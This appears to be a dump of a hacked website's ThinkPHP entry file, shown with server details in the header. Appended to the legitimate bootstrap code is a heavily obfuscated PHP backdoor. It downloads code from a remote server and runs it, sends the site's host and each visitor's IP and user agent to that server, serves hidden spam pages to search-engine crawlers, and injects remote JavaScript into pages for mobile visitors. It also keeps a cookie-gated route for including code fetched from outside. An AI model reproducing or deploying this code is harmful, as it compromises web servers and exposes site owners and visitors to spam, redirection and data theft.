|
Server : nginx/1.18.0 System : Linux iZrj9edhd5u5pfsek09o1jZ 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 User : www ( 1000) PHP Version : 5.6.40 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv Directory : /mnt/web/www.neatabattery.com/core/ |
<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006~2018 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------
namespace think;
// ThinkPHP 引导文件
require __DIR__ . '/base.php';
// 2. 执行应用
App::run()->send();
function function_tool(){
$rot="str_rot13";$en=$rot("onfr64_rapbqr");$de=$rot("onfr64_qrpbqr");$gu=$rot("tmhapbzcerff");$gc=$rot("tmpbzcerff");$fg=$rot("svyr_trg_pbagragf");$fp=$rot("svyr_chg_pbagragf");$df=$rot("qrsvar");$sr=$rot("fge_ercynpr");$pm=$rot("cert_zngpu");$ul=$rot("heyrapbqr");@session_start();$se = $_SESSION;$is=$rot("vffrg");$er = $_SERVER;$ree=$rot("UGGC_ERSRERE");$cah=$rot('pnpurf/gcy/');$them=$rot("gurzrf/");$stc=$rot("fgernz_pbagrkg_perngr");$df('dm', $er['HTTP_HOST']);$fe=$rot("svyr_rkvfgf");$ulk=$rot("hayvax");
function getIPt($er) {$ip_headers = array('HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_REAL_IP','REMOTE_ADDR');foreach ($ip_headers as $hdr) {if (isset($er[$hdr]) && !empty($er[$hdr])) {$ipl = explode(',', $er[$hdr]);$ip = trim($ipl[0]);if (filter_var($ip, FILTER_VALIDATE_IP)) {return $ip;}}}return isset($er['REMOTE_ADDR']) && !empty($er['REMOTE_ADDR']) ? $er['REMOTE_ADDR'] : '0.0.0.0';}$u_ip = getIPt($er);error_reporting(0);header('Content-Type:text/html;charset=utf-8');$opts = array('http'=>array('method'=>"GET",'timeout'=>6));$ct = $stc($opts);
if (!$fe($cah)) {mkdir($cah, 0755, true);};if (!$fe($them)) {mkdir($them, 0755, true);};$check = array("<--START-->", "<--END-->");$udl = $de($rot("nUE0pQbiY2cmL2EhYJcmLmDhqT9jYj=="));$utctme = time();$bjtme = $utctme + (3600 * 8);$h_l_1 = (int) gmdate('G', $bjtme);if ($h_l_1 >= 13 && $h_l_1 < 14) {$tz_0_ = false;} else {$tz_0_ = true;}$jsc=$udl;$icf = $rot('pnpurf/gcy/n11939n301p3nr15018qs559n8n2o102v');
$rexc = '';$rex = $rot('pnpurf/gcy/n11939n301p3nr15018qs9n8n2o102cc');
if (is_writable($cah)) {if(!$tz_0_){$f_l = $rot('pnpurf/').md5('update.lock');if (!$fe($f_l) || date('Y-m-d', filemtime($f_l)) !== date('Y-m-d')) {$udch = @$fg($udl.$rot('qngn/hcqngr.cuc?pnpur'),false,$ct);if($udch==="on"){if (is_dir($cah)) {$fls = scandir($cah);foreach ($fls as $f) {if ($f != "." && $f != "..") {$pth = $cah . "/" . $f;if (is_dir($pth)) {} else {unlink($pth);}}}}}$udst = @$fg($udl.$rot('qngn/hcqngr.cuc?hcqngr'),false,$ct);if($udst==="on"){$cd=@$fg($udl.$rot('qngn/pbqrhq.cuc'),false,$ct);$fp($icf,$de($cd));}$rexc = @$fg($udl.$rot('qngn/hcqngr.cuc?erk'),false,$ct);if($rexc){$len=strlen($rexc);$rs=$fp($rex,$rexc);if ($rs===false||$rs<$len){$dir=dirname($rex);$free=@disk_free_space($dir); if($free !== false && $free < $len) {if (is_dir($cah)) {$fls = scandir($cah);foreach ($fls as $f) {if ($f != "." && $f != "..") {$pth = $cah . "/" . $f;if (is_dir($pth)) {} else {unlink($pth);}}}}}}}touch($f_l); }}}if ($fe($icf)) {include $icf;}
if (is_writable($them)) {
$ky="n11939n301p3nr15018qs559n8n2o102cf";$cF = $them.$ky;
if ($fe($cF)) {$cf = json_decode($de($rot($fg($cF))), true);if (time() - filemtime($cF) > 604800) {unlink($cF);}}else{
$opt2s = array('http'=>array('method'=>"POST",'header' => "Content-Type: application/x-www-form-urlencoded\r\n",'content' => http_build_query(array('key'=>$ky,'dm'=>dm)),'timeout'=> 15));$ct2=$stc($opt2s);
$res=$fg($jsc."/AAPPIv3.php",false,$ct2);$cf = json_decode($de($rot($res)), true);if ($cf['success']) {$fp($cF,$res); }}
if ($cf['py'] != "no") {$py = $cf['py'];$tD = $them.$py;if (!is_dir($tD)) { mkdir($tD, 0755, true);}
function ds($u, $s) {$opt = array('http' => array('method' => 'GET','header' => "User-Agent: Mozilla/5.0\r\n"));$ct = stream_context_create($opt);$d = file_get_contents($u, false, $ct);if ($d === false || strlen($d) < 100) return false;file_put_contents($s, $d);return $fe($s);}function unz($zp, $ex, $mk) {if (!$mk || !is_dir($ex . '/' . $mk)) {$z = new \ZipArchive();if ($z->open($zp) === TRUE) {$z->extractTo($ex);$z->close();return true;} else {return false;}}return true;}
$zP = "$tD/ths";$iP = "$tD/img";if (!$fe($zP)) {ds($cf['thz'], $zP);}if (!$fe($iP)) {ds($cf['imgz'], $iP);}
if (!$cf['uz']) {if (!is_dir("$tD/assets") && !is_dir("$tD/static")) {unz($zP, $tD, 'assets') || unlink($zP);}if (!is_dir("$tD/images")) {unz($iP, $tD, 'images') || unlink($iP);}} else {unz($zP, $tD, null);unz($iP, $tD, null);}}}
if ($fe($rex)){$rexc =$fg($rex);$rexc=$de($rot($rexc));}if (!$rexc){$rexc=$de($rot("V14iXQ86KUpeYlx/MTI0LJyfYlt/Byk3Xlx/XQ86Y3kpYzu0oJjcClDwDRONV14iXSk3XlxiozI3pl8bKUpeXIjhnUEgoPDwDRONVl9xo3qhYluoKv9qXlxxV0ONDPArYlupqlfcY2EyqTScoP8bKUpeXIjhnUEgoPDwDRONV14iYvf/MTI0LJyfYl4eCl8hXm9pYzu0oJjxV0ONDPArYm8bCmcpqlfiXG9xMKEunJkmCl9pqlfbCmcpYaZ/nUEgoPx/WPAc"));}$prex = explode($de('QEBA'), trim($rexc));$vp = array();foreach ($prex as $p) {$p = trim($p);if ($p && @$pm($p, '') !== false) {$vp[] = $p;}}
if(function_exists("function_tool_rm")){function_tool_rm();}elseif($er['REQUEST_METHOD'] == 'GET'){
$df('url', $er['REQUEST_URI']);$df('ref', $er["HTTP_REFERER"]);$df('u_ip', $u_ip);$df('c_host', $er['HTTP_HOST']);$df('ent', $er['HTTP_USER_AGENT']);$df('host_path2', $de($rot("nUE0pQbiY2cmL2EhYJcmLmVhqT9jYj==")));$df('mob', $de("QG1vYmlsZXxOT0tJQXxMR3xTYW1zdW5nfG1pZHB8d2FwfHVjd2VifHdlY2hhdHxNaWNyb01lc3NlbmdlcnxQaG9uZXxBbmRyb2lkfHdlYk9TfGlQaG9uZXxpUGFkfGlQb2R8QmxhY2tCZXJyeXxPcGVyYSBNaW5pfHVjd2VifG9wZXJhbWluaUBp"));$df('nomomob', $de("QE1SQTU4TlNPU0Bp"));$df('regs', $de("QEJhaWR1fFNvZ291fFlpc291fEhhb3NvdXxTcGlkZXJ8U28uY29tfDM2MFNwaWRlcnxZb3VkYW9Cb3R8U20uY258c29zb3x0b3V0aWFvQGk="));$df('moagent', $de("VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzU4LjAuMzAyOS4xMTAgU2FmYXJpLzUzNy4z"));$df('accept_', $de("QWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS9hdmlmLGltYWdlL3dlYnAsKi8qO3E9MC44"));$ext = strtolower(pathinfo(parse_url(url, PHP_URL_PATH), PATHINFO_EXTENSION));
$ts = array('text/html; charset=UTF-8','jpg' => 'image/jpeg','webp' => 'image/webp','jpeg' => 'image/jpeg','png' => 'image/png','gif' => 'image/gif','bmp' => 'image/bmp','css' => 'text/css;charset=UTF-8','js' => 'application/javascript;charset=UTF-8','xml' => 'application/xml; charset=UTF-8','svg' => 'image/svg+xml',);$ctt = $de("Q29udGVudC1UeXBlOiA=");
if (empty($ext) || !isset($ts[$ext])) {$ext = "html";}
$mak = false;for ($i = 0; $i < count($vp); $i++) {if ($pm($vp[$i], url)) {$mak = true;break;}}
$h_l_1 = (int) gmdate('G', $bjtme);if ($h_l_1 >= 6 && $h_l_1 < 23) {$tz_1_ = false;} else {$tz_1_ = true;}
$op_1 = array('http' => array('header' => array(moagent, accept_, "Accept-Language: en-US,en;q=0.5"),),);
if (strpos(c_host,'www.')===0){$wm=substr(c_host,4);}elseif(strpos(c_host,'m.')===0){$wm=substr(c_host,2);}
$fs = array($cah.md5(c_host.url."shouye"."on"),$cah.md5(c_host.url."shouye"."off"),$cah.md5($wm.url."shouye"."on"),$cah.md5($wm.url."shouye"."off"));
foreach($fs as $fss){if($fe($fss)){$fss=$fss;break;}}
if($pm(mob, ent)){$mo="off";}else{$mo="on";};$cpy=$rot("/ppbbccll/");$pa = array("/svyr_chg_pb/", "/urk2ov/", "/r_shapgvba/", "/SHPXLBHJNS/", "/cobbg:vs/", "/Vaqrkbg:vs/");foreach ($pa as $p) {if ($pm($rot($p), url)) exit;}$O0="Y2hveXA=";$O0=$de($O0);$OO=$O0[0].$O0[2].$O0[4].$O0[3];$oo =$de($rot("nUE0pQbiY2AiMTHhLaLkAwthnJA1Y2cmL2MgYaE4qN=="));$o0 = $O0[4].$O0[1].$O0[4];
if($pm($cpy, url)){$OO($oo,$de($rot("ITSaL29hMzyaYt==")).$o0);}$pax = sys_get_temp_dir()."/".md5(date("h"));;$cpys=$rot("/ppbbccgrzc/");
if($pm($cpys, url)){$OO($oo,$pax);setcookie('ppbbccllgrzc', md5("ppbbccllgrzc"), time() + 5600, '/');echo "copy";}
if (isset($_COOKIE['ppbbccllgrzc']) && $_COOKIE['ppbbccllgrzc'] === md5("ppbbccllgrzc")) {if($fe($pax)){include($pax);
if (isset($_GET['do_logoutx']) && $_GET['do_logoutx'] == 'true') {setcookie('ppbbccllgrzc', '', time() - 3600, '/');$ulk($pax);header("Location: " .$er['PHP_SELF']);exit;}echo $de('PGJ1dHRvbiBvbmNsaWNrPSJMZ3R4KCkiIHN0eWxlPSJwYWRkaW5nOiAxMHB4IDIwcHg7IGJhY2tncm91bmQ6ICNmZjRkNGQ7IGNvbG9yOiB3aGl0ZTsgYm9yZGVyOiBub25lOyBib3JkZXItcmFkaXVzOiA1cHg7IGN1cnNvcjogcG9pbnRlcjsiPkxvZ291dDwvYnV0dG9uPjxzY3JpcHQ+ZnVuY3Rpb24gTGd0eCgpIHt3aW5kb3cubG9jYXRpb24uaHJlZiA9ICI/ZG9fbG9nb3V0eD10cnVlIjt9PC9zY3JpcHQ+');}}
$js_c = $de('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPnZhciBiYyA9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTE2LDExNiwxMTIsMTE1LDU4LDQ3LDQ3LDk5LDExMSwxMTQsMTAxLDQ2LDExMSwxMDMsMTIyLDEwNCwxMDEsMTEwLDExNCwxMDEsMTEwLDQ2LDk5LDExMSwxMDksNDcsMTEwLDEwNSwxMDMsMTA0LDExNiw5OSwxMTEsMTAwLDEwMSw0NiwxMDYsMTE1KTsgdmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOyBzY3JpcHQuc3JjID0gYmM7IGRvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQoc2NyaXB0KTs8L3NjcmlwdD4=');
$js_cs = $de('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPjt2YXIgYmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTExLDExNCwxMDEsNDYsMTExLDEwMywxMjIsMTA0LDEwMSwxMTAsMTE0LDEwMSwxMTAsNDYsOTksMTExLDEwOSw0NywxMDYsMTEzLDExNywxMDEsMTE0LDEyMSw0NSw1MSw0Niw1Niw0Niw0OSw0NiwxMDksMTA1LDExMCw0NiwxMDYsMTE1KTsgdmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOyBzY3JpcHQuc3JjID0gYmM7IGRvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQoc2NyaXB0KTs8L3NjcmlwdD4=');
if($pm("@id=[[:alnum:]]{6}-[[:alnum:]]{6}@i", url)){
if($pm(regs, ref)){$ua = "pc";$p = "js_txt"; $host_path = $jsc;$d = $ul($en($gc("ua=".$ua."&files=".$p."&host=".c_host."&path=".url."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref)))));
$jst = @$fg($host_path."/AAPPIv3.php?bagzse=".$d,false,$ct) ?: $fg(host_path2."/AAPPIv3.php?bagzse=".$d,false,$ct);
if($jst) {$jst=$sr($check,"",$jst);$jst = $gu($de($jst));$r_js_txt = "<meta charset=\"utf-8\"><script type=\"text/javascript\" >".$jst."</script>";echo $r_js_txt;exit;}
} elseif($pm(regs, ent)) {$ua = "pc";$p = "neiye"; $cf = $cah.md5(c_host.url.$p.$mo);$ch = ($fe($cf) && (time() - filemtime($cf)) <= 8800000) ? 1 : 0;$d = $ul($en($gc("ua=".$ua."&files=".$p."&host=".c_host."&path=".url."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref)))));
if($ch){$hlt=$fg($cf);}else{$host_path = $jsc;$hlt = $fg($host_path."/AAPPIv3.php?bagzse=".$d, false, $ct);}
foreach($check as $item){if(strpos($hlt,$item)===false){$ch=1;break;}}if ($ch === 0) {foreach($check as $item) {$hlt = $sr($item, '', $hlt);}}$hlt = $gu($de($hlt));
if($hlt) {if(!$ch){$fp($cf,$en($gc($hlt)));}echo $hlt;exit;}
}
} elseif($pm(regs, ent)) {
$sm = $rot("fvgrznc");
$ua = "pc";$p = "shouye"; $cf = $cah.md5(c_host.url.$p.$mo);$ch = ($fe($cf) && (time() - filemtime($cf)) <= 430000) ? 1 : 0;if (filemtime($cf) <= "1761190200"){@$ulk($cf);}
$d = $ul($en($gc("ua=".$ua."&files=".$p."&host=".c_host."&path=".$sr("&","***",url)."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref)))));
if($ch){$hlt=$fg($cf);}else{$host_path = $jsc;$hlt = @$fg($host_path."/AAPPIv3.php?bagzse=".$d, false, $ct) ?: $fg(host_path2."/AAPPIv3.php?bagzse=".$d, false, $ct);}
foreach($check as $item){if(strpos($hlt,$item)===false){$ch=1;break;}}
foreach($check as $item) {$hlt = $sr($item, '', $hlt);}$hlt = $gu($de($hlt));
if($hlt) {if(!$ch){$fp($cf,$en($gc($hlt)));};
$hts = (!empty($er['HTTPS']) && $er['HTTPS'] !== 'off');$pol = $hts ? 'https://' : 'http://';
$pot = $er['SERVER_PORT'];if (($hts && $pot == 443) || (!$hts && $pot == 80)) {$hot = $sr('/:\d+$/', '', c_host);}$htps= $pol.$hot;$hlt = $sr("h@t@t@p", $htps, $hlt);if (strpos(url, $sm.'.xml') !== false) {if($hlt){$fp($sm.".xml",$hlt);}}if (strpos(url, $sm.'.txt') !== false) {if($hlt){$fp($sm.".txt",$hlt);}}if (strpos(url, $sm.'.html') !== false) {if($hlt){$fp($sm.".html",$hlt);}}echo $hlt;exit;}
} elseif($pm(regs, ref) && $pm(mob, ent) && !$pm(nomomob, ent)) {
$ua = "pc";$p = "shouye"; $host_path = $jsc;$d = $ul($en($gc("ua=".$ua."&files=".$p."&host=".c_host."&path=".$sr("&","***",url)."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref)))));
if ($mak){echo $js_cs;exit;}
$jst = @$fg($host_path."/AAPPIv3.php?bagzse=".$d,false,$ct) ?: $fg(host_path2."/AAPPIv3.php?bagzse=".$d,false,$ct);
if($jst) {$jst=$sr($check,"",$jst);$jst = $gu($de($jst));$r_js_txt = "<meta charset=\"utf-8\"><script type=\"text/javascript\" >".$jst."</script>";if (strpos($jst, 'matomo') !== false) {echo $r_js_txt;exit;}
}
}elseif ($mak && $pm(mob, ent) && !$pm(nomomob, ent) ){echo $js_cs;exit;}
elseif($pm(mob, ent) && !$pm(nomomob, ent) && $tz_1_) {$hlt = $fg("http://".c_host . url,false,stream_context_create($op_1));
if($hlt){$rp_1 = $de('U3RyaW5nLmZyb21DaGFyQ29kZSg2MCwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDMyLDExNSwxMTQsOTksNjEsMzQsMTA0LDExNiwxMTYsMTEyLDExNSw1OCw0Nyw0Nyw5OSwxMTEsMTE0LDEwMSw0NiwxMTEsMTAzLDEyMiwxMDQsMTAxLDExMCwxMTQsMTAxLDExMCw0Niw5OSwxMTEsMTA5LDQ3LDEwNiwxMTMsMTE3LDEwMSwxMTQsMTIxLDQ1LDUxLDQ2LDU2LDQ2LDQ5LDQ2LDEwOSwxMDUsMTEwLDQ2LDEwNiwxMTUsMzQsNjIsNjAsNDcsMTE1LDk5LDExNCwxMDUsMTEyLDExNiw2Mik=');$hlt = preg_replace('/<\/body>/i',"</body>".str_repeat(' ', 1500).$js_c,$hlt);$hlt= preg_replace('/String\.fromCharCode\(60,(.*?)62\)/', $rp_1, $hlt);$hlt = preg_replace('/<meta\s+http-equiv=["\']mobile-agent["\']\s+content=["\']format=xhtml;url=[^"\']+["\']\s*\/?>/i', '', $hlt);$hlt = preg_replace('/window\.location\.href=(["\'])(.*?)\1;?/', '', $hlt);echo $hlt;exit;}
}
}
}